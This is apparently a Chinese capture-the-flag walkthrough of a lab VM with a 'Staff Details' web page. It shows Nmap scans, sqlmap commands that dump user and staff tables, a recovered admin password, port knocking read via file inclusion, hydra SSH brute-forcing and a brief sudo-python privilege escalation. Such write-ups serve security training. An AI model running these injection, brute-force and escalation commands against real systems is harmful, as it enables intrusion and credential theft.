1.主机发现
Nmap -sP 192.168.43.0/24
C:\Users\ASUS>Nmap -sP 192.168.43.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2020-11-11 11:53 ?D1ú±ê×?ê±??
Nmap scan report for 192.168.43.79
Host is up (0.0010s latency).
MAC Address: 00:0C:29:B7:B6:AD (VMware)
Nmap scan report for 192.168.43.131
Host is up (0.0060s latency).
MAC Address: 46:EC:05:32:DF:DA (Unknown)
Nmap scan report for 192.168.43.193
Host is up (0.0020s latency).
MAC Address: 00:0C:29:D4:89:D8 (VMware)
Nmap scan report for 192.168.43.244
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 39.40 seconds
2.信息收集
端口扫描
C:\Users\ASUS>Nmap -A 192.168.43.79 -p- -oN nmap.A
Starting Nmap 7.70 ( https://nmap.org ) at 2020-11-11 11:55 ?D1ú±ê×?ê±??
Stats: 0:00:02 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Stats: 0:00:05 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
ARP Ping Scan Timing: About 100.00% done; ETC: 11:55 (0:00:00 remaining)
Nmap scan report for 192.168.43.79
Host is up (0.00043s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 00:0C:29:B7:B6:AD (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.43 ms 192.168.43.79
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.63 seconds
C:\User
访问web界面
3.漏洞利用
尝试SQL注入
web界面存在4个按钮,看见有一个表单,使用sqlmap尝试注入。
qlmap -u "http://192.168.43.79/results.php" --data "search=1" --dbs
表名
sqlmap -u "http://192.168.43.79/results.php" --data "search=1" -D users --tables
跑表中字段
sqlmap -u "http://192.168.43.79/results.php" --data "search=1" -D users -T UserDetails --dump
字段内容
users表中的内容为一些用户的账号密码
之后看一下Staff库中的内容
sqlmap -u "http://192.168.43.79/results.php" --data "search=1" -D Staff --tables
sqlmap -u "http://192.168.43.79/results.php" --data "search=1" -D Staff -T StaffDetails --columns -batch
查看Staff库中 User表中字段内容
sqlmap -u "http://192.168.43.79/results.php" --data "search=1" -D Staff -T Users --dump -batch
这里Sqlmap直接给我们爆破出来了密码可以直接用来登录。
使用admin登录
admin:transorbital1
尝试adminSSH登录失败
登录后发现文件包含漏洞
可能使用端口敲门服务knockd,
查看配置文件内容 /etc/knockd.conf
Nmap 尝试访问端口
查看22端口是否开启
尝试SSH登陆系统
这里登陆需要密钥对。
通过User库中的信息生成字典进行爆破
hydra -L usera -P passwda 192.168.43.79 ssh
SSH登陆janitor
ssh janitor@192.168.43.79
登陆之后发现密码文件存入刚刚的爆破密码里继续爆破。
hydra -L usera -P passwda 192.168.43.79 ssh
这次多出了fredf用户,SSH登录看看
4.提权
登录之后sudo -l查看是否存在管理员权限命令
发现python脚本可以sudo执行
kali下生成非对称加密密码
写入创建用户命令,执行脚本。